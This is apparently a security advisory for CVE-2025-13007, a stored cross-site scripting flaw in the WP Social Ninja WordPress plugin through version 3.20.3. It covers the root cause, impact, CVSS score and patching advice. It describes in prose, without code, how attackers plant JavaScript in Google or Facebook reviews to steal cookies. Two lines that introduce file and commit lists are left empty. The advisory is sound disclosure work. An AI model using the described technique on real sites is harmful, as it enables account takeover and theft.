Overview
A significant security vulnerability, identified as CVE-2025-13007, has been discovered in the WP Social Ninja – Embed Social Feeds, Customer Reviews, Chat Widgets plugin for WordPress. This vulnerability is a Stored Cross-Site Scripting (XSS) flaw, affecting all versions up to and including 3.20.3. It allows unauthenticated attackers to inject malicious JavaScript code into pages, potentially compromising user accounts and website security.
Technical Details
The root cause of this vulnerability lies in the plugin’s insufficient input sanitization and output escaping when handling content sourced from external platforms, such as Google Business Profile and Facebook. Specifically, the plugin fails to properly sanitize and escape user-controllable data within reviews or posts pulled from these social platforms before rendering it on the WordPress site.
An attacker can exploit this by crafting malicious content containing JavaScript code on a connected Google Business Profile or Facebook page. When the plugin retrieves and displays this content, the injected JavaScript will execute in the context of the user’s browser who is viewing the affected page. This allows the attacker to perform actions such as stealing cookies, redirecting users, or defacing the website.
Review of the code shows the vulnerability exist within the following files:
CVSS Analysis
- Severity: MEDIUM
- CVSS Score: 6.1
Possible Impact
Successful exploitation of this vulnerability can have serious consequences:
- Account Compromise: Attackers could steal user cookies and session data, gaining unauthorized access to user accounts, including administrator accounts.
- Website Defacement: Malicious scripts can modify website content, leading to defacement and reputational damage.
- Redirection to Malicious Sites: Users can be redirected to phishing websites or sites hosting malware, potentially leading to further compromise.
- Data Theft: Sensitive information displayed on the affected pages could be stolen.
Mitigation and Patch Steps
The recommended course of action is to immediately update the WP Social Ninja plugin to the latest available version. The vulnerability is patched in versions released after 3.20.3.
If updating is not immediately possible, consider temporarily disabling the plugin until an update can be applied. Also, carefully review the connected social media accounts for any suspicious or malicious content.
Changes to the code can be seen in the following commits: